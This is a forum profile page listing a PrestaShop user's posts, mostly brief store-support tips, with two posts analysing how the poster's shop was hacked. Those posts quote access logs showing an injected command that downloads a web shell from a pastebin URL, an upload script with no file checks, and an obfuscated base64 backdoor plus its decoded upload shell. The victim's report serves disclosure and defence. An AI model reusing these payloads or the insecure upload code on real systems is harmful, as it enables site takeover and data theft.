Jump to content

irder

Members
  • Posts

    340
  • Joined

  • Last visited

Everything posted by irder

  1. 有可能重新生成图片的算法有问题啊,没发现啊
  2. irder

    paypal支付问题

    永远不要用paypal , 会莫名的把你账号和别人的关联,封掉
  3. all the stores share the same folder, path,web files and database, i don't think it a good idea to enable multi store
  4. there are problems with supershop theme, my store was hacked,
  5. yes, it's from 217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7 217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297 i installed this module verticalmegamenus and the first new folder was temps
  6. maybe /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php
  7. here are some access logs maybe the web shell file was uploaded from the last few lines 216.244.66.229 - - [12/Sep/2019:03:57:49 +0000] "GET /item/1167/chinese-letter-print-restaurant-waitress-jacket-waiter-uniform.html HTTP/1.1" 301 - 217.61.98.64 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785 217.61.98.64 - - [12/Sep/2019:04:09:44 +0000] "GET /spy.php HTTP/1.1" 404 78683 217.61.98.64 - - [12/Sep/2019:04:09:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785 217.61.98.64 - - [12/Sep/2019:04:09:47 +0000] "GET /spy.php HTTP/1.1" 404 78683 217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785 217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683 217.61.98.64 - - [12/Sep/2019:04:13:49 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744 217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768 217.61.98.64 - - [12/Sep/2019:04:14:23 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718 217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36 217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7 217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297 217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785 217.61.98.64 - - [12/Sep/2019:04:14:26 +0000] "GET /spy.php HTTP/1.1" 404 78683 217.61.98.64 - - [12/Sep/2019:04:14:27 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744 217.61.98.64 - - [12/Sep/2019:04:15:02 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768 217.61.98.64 - - [12/Sep/2019:04:15:03 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718 217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36 217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7 217.61.98.64 - - [12/Sep/2019:04:15:05 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3302 216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620
  8. it's very possible the web shell file was upload from some modules of supershop theme, i also installed kuteshop theme, unlucky, the hacker deleted all my website files, nearly we can make sure the back door file php file to get web shell was upload from \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php the code with Serious security problem it doesn't verify the file types and audit the permission at all, i bought this theme,but it ruin my store ! <?php require_once(dirname(__FILE__).'../../../config/config.inc.php'); require_once(dirname(__FILE__).'../../../init.php'); require_once(dirname(__FILE__).'/verticalmegamenus.php'); $tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/'; $fileName = $_FILES["uploadimage"]["name"]; $pathFile = $tempPath.$fileName; if(($_FILES["uploadimage"]["size"] > 1000000)){ echo "File size is greater than 1MB"; }else{ if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) { echo $fileName; }else { echo "File upload failed."; } } ?> one the web shell back door file, the index.php was modified with these code at the begin of the file <?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){ $func="cr"."ea"."te_"."fun"."ction"; $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));"); $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg=="); exit;}?><?php after decode <?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>Done! Open</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>'; ?>
  9. maybe you can try to clear the content of table ' ps_tab' , 'ps_tab_lang' ,and insert new from sql files, please backup first,
  10. sorry,i have forgotten how i solve this problem,
  11. it's so hard to see the forum topic titles clearly
  12. maybe you should set max_execution_time longer in php configuration file
  13. you should upgrade the 1-key upgrade module to the latest version first
  14. please add the name of the attribute to the < a title="attribute name"></a> to the template file
  15. [ERROR] PHP 1.7.0.0 /* PHP:ps1700_stores(); */ SQL 1.7.0.0 1267 in /* Save the new IDs */ UPDATE `ps_tab_transit` tt SET `id_new_tab` = ( SELECT `id_tab` FROM `ps_tab` WHERE CONCAT(`class_name`, COALESCE(`module`, '')) = tt.`key` ): Illegal mix of collations (utf8_unicode_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation '='
  16. can i show my store? https://www.cheertao.com/en/
  17. 这个应该是根据结账时候传进去的国家代码或者客户位置自动切换的,我估计是,所以不用担心
  18. it's contact modules now,please make sure it's enabled
  19. hello,you should apply a percent discount type,maybe discount type percent -1/6
  20. /mail or /themes/yourtheme/mails if you want to find the mail template files
×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More